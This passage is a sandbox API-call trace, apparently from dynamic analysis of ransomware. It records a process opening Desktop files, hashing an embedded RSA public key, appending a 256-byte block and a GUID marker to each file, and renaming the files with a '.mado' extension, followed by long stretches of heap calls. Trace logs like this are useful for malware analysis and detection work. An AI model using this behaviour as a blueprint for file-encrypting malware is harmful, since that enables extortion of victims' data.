CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0203.925] GetLastError () returned 0x0 [0203.925] CryptDestroyHash (hHash=0x32ef238) returned 1 [0203.925] CryptReleaseContext (hProv=0x3219e0, dwFlags=0x0) returned 1 [0203.925] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0203.925] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0203.925] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0203.925] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b67078, Size=0x218) returned 0x3b7c6a8 [0203.925] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xcbba, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.925] WriteFile (in: hFile=0x63c, lpBuffer=0x3b68078*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b68078*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0203.939] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0203.939] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0203.939] CloseHandle (hObject=0x63c) returned 1 [0203.940] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZzWIu6eAVS.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zzwiu6eavs.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZzWIu6eAVS.jpg.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zzwiu6eavs.jpg.mado")) returned 1 [0203.942] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44683180, ftCreationTime.dwHighDateTime=0x1d5d7b1, ftLastAccessTime.dwLowDateTime=0x416d25a0, ftLastAccessTime.dwHighDateTime=0x1d5dd72, ftLastWriteTime.dwLowDateTime=0x416d25a0, ftLastWriteTime.dwHighDateTime=0x1d5dd72, nFileSizeHigh=0x0, nFileSizeLow=0x1070e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_CHUcr-x1w49.mp3", cAlternateFileName="_CHUCR~1.MP3")) returned 1 [0203.942] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_CHUcr-x1w49.mp3") returned=".mp3" [0203.942] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_CHUcr-x1w49.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_chucr-x1w49.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0203.943] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=67342) returned 1 [0203.943] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0203.944] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x106e8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.944] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0203.946] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x1070e, lpOverlapped=0x0) returned 1 [0203.946] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.946] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.946] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.946] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x3219e0) returned 1 [0203.947] CryptCreateHash (in: hProv=0x3219e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0203.947] CryptHashData (hHash=0x32ef238, pbData=0x32eb20, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0203.947] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0203.947] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0203.947] GetLastError () returned 0x0 [0203.947] CryptDestroyHash (hHash=0x32ef238) returned 1 [0203.947] CryptReleaseContext (hProv=0x3219e0, dwFlags=0x0) returned 1 [0203.948] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0203.948] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0203.948] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0203.948] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b67078, Size=0x218) returned 0x3b7c6a8 [0203.948] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x1070e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.948] WriteFile (in: hFile=0x63c, lpBuffer=0x3b68078*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b68078*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0203.949] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0203.949] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0203.949] CloseHandle (hObject=0x63c) returned 1 [0203.950] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_CHUcr-x1w49.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_chucr-x1w49.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_CHUcr-x1w49.mp3.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_chucr-x1w49.mp3.mado")) returned 1 [0203.951] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44683180, ftCreationTime.dwHighDateTime=0x1d5d7b1, ftLastAccessTime.dwLowDateTime=0x416d25a0, ftLastAccessTime.dwHighDateTime=0x1d5dd72, ftLastWriteTime.dwLowDateTime=0x416d25a0, ftLastWriteTime.dwHighDateTime=0x1d5dd72, nFileSizeHigh=0x0, nFileSizeLow=0x1070e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_CHUcr-x1w49.mp3", cAlternateFileName="_CHUCR~1.MP3")) returned 0 [0203.951] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0203.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0203.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3578 | out: hHeap=0x2c0000) returned 1 [0203.951] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0203.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0203.951] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0203.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0203.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0203.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0203.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0203.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0203.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0203.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0203.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0203.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0203.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0203.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0203.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0203.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0203.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0203.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0203.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0203.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0203.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0203.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0203.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0203.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0203.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0203.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0203.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0203.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0203.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0203.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0203.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0203.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0203.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0203.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0203.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0203.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0203.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0203.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0203.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0203.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0203.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0203.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0203.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0203.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0203.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0203.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0203.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0203.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0203.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0203.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0203.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0203.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0203.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0203.956] 